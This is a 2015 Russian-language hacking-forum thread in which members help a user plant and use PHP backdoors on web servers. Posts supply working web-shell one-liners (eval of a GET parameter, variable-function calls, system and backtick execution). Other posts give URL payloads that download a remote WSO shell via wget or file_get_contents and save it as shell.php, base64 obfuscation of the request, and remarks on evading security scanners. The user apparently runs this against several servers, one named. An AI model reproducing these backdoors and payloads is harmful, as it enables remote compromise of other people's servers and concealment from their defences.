Бэкдор php - загрузка файла

Discussion in 'Песочница' started by skaska, 25 Jul 2015.

  1. skaska

    skaska New Member

    Joined:
    4 May 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    тестирую на своем сервере, на site.ru/ в файл, index.php (или в любой др файл читаемый в браузере) прописываю это бэкдор:
    PHP:
    [CODE]<?php if ($_REQUEST['param1']&&$_REQUEST['param2']) {$f $_REQUEST['param1']; $p = array($_REQUEST['param2']); $pf array_filter($p$f); echo 'OK'; } else { echo 'You are forbidden!'; } ?>
    [/CODE]
    не ругайте сильно - учусь... что мне нужно ввести в адресной строке, чтоб загрузить файл на сервер? вариант без использования куков, т е простой вариант есть? знаю, нужно исполнить команду: можно через eval,
    типа site.ru/index.php?f=eval.......????

    подскажите что ввести в адресной строке для загрузки файла на сервер именно для этого бэкдора, буду каждому благодарен!
     
  2. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    .php?param1=eval&param2=wget http://site.com/wso.txt -O shell.php
    как-то так,возможно вместо eval надо будет писать exec,system и т.д ,использовать кодирование,вместо wget curl
     
    _________________________
    skaska likes this.
  3. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Код можно очень сильно сократить ;)
     
  4. skaska

    skaska New Member

    Joined:
    4 May 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    команда рабочая, спасибо... но работает не всегда, из 5 серверов на один загрузило удачно! на остальные выдает это
    HTML:
    Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name in /var/www/u2847619/data/www/adgstroy.ru/index.php on line 3
    OK
    иногда пишет ОК, по факту на серваке пусто.
    права нужные (в загружаемой категории уже лежит рабочий шелл), вариации перебрал exec,system и вместо wget curl... в чем может быть загвоздка?
     
  5. skaska

    skaska New Member

    Joined:
    4 May 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    да можно знаю, иногда получается с таким вариантом:

    <?php eval($_GET[cmd]); ?>

    Code:
    http://site.ru/cashe.php?cmd=$url = "http://ышеу2.ru/data/shell.txt";$content = file_get_contents($url);$h = fopen("shell.php","w");$text = "$content";fwrite($h,$text);fclose($h);
    опять же в меньше половины случаев(
     
  6. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Я имел другое ввиду, ваш код из первого поста можно сократить значительно, а использование eval прям в коде это паливо жестокое
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    wget это системная функция, eval-то при чем?
     
    _________________________
  8. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Наверное потому что eval не явлется функцией, а там хз не буду утверждать 100%
     
  9. koro

    koro Banned

    Joined:
    16 Jul 2015
    Messages:
    31
    Likes Received:
    14
    Reputations:
    0
    • PHP:
      if(isset($_REQUEST['cmd'])){
      $cmd = ($_REQUEST["cmd"]);

      echo 
      "<pre>";
      system($cmd);
      echo 
      "</pre>";
      die;
      }
     
  10. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    еще один хакер... давайте глупости писать не будем может?
     
  11. koro

    koro Banned

    Joined:
    16 Jul 2015
    Messages:
    31
    Likes Received:
    14
    Reputations:
    0
    а нафига велосипед изобретать
     
  12. koro

    koro Banned

    Joined:
    16 Jul 2015
    Messages:
    31
    Likes Received:
    14
    Reputations:
    0
    PHP:
    include("data:text/plain;base64,base64_encode($_GET['c'])");
     
    #12 koro, 25 Jul 2015
    Last edited: 25 Jul 2015
    попугай likes this.
  13. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Может велосипед нужен для того чтоб обойти сканеры безопасности?
     
    koro likes this.
  14. skaska

    skaska New Member

    Joined:
    4 May 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    поклон всем за ответы... опытным путем выявил, что самым рабочим вариантов является этот
    Code:
    <?php eval($_GET[cmd]); ?>
    но он и самый палевый! вопрос, можно ли его абфусцировать с сохранением работоспособности, если да - меняется ли кодировка запроса?
    сейчас запрос таков:
    Code:
    http://site.ru/index.php?cmd=$url = "http://site2.ru/text.txt";$content = file_get_contents($url);$h = fopen("text.php","w");$text = "$content";fwrite($h,$text);fclose($h);
     
  15. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Code:
    http://site.ru/index.php?cmd=base64_decode('JHVybCA9ICJodHRwOi8vc2l0ZTIucnUvdGV4dC50eHQiOyRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7JGg9Zm9wZW4oInRleHQucGhwIiwidyIpOyR0ZXh0ID0gIiRjb250ZW50Ijtmd3JpdGUoJGgsJHRleHQpO2ZjbG9zZSgkaCk7');
    Кодировать тут http://securityxploded.com/online-base64-encoder.php
    Еще вот посмотри
    http://habrahabr.ru/post/215139
    http://habrahabr.ru/post/215817/
     
    _________________________
    skaska likes this.
  16. skaska

    skaska New Member

    Joined:
    4 May 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    спасибо за ссылки, ответ на свой вопрос там не нашел... в соседней ветки нашел что можно абфуцировать так
    Code:
    <?php
    eval(base64_decode('cGhwaW5mbygpOw'));
    ?>
    но зачем он это сделал я не понял, ведь функция eval как говориться наружу бархатом осталась.. смысл было это делать..
    интересует конкретно вопрос: можно ли обфусцировать всю строку без потери работоспособности и меняется ли при этом кодировка в запросе?
     
  17. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Б3, запости им свой зиродей
     
  18. skaska

    skaska New Member

    Joined:
    4 May 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    разобрался ребята, за назойливость прошу простить

    для меня лучший варик это:

    Code:
    <?php $_REQUEST['f']($_REQUEST['c']); ?>
    file.php?f=assert&c=phpinfo();
    file.php?f=eval&c=echo 1;
    проверил работает! дальше больше... :)

    и еще, eval часто не срабатывает - заменяем на exec или system и радуемся. Выше хороший человек подсказал: спасибо ему второй раз!:)
     
  19. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    eval работает всегда а вот как раз таки system часто отключен, уверен на 100% передаешь в eval невалидный код вот и облом
     
  20. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    <?=`$_COOKIE['x']`
    wget это утилита.
     
    _________________________
Loading...
Similar Threads - Бэкдор загрузка файла
  1. Loents
    Replies:
    14
    Views:
    2,705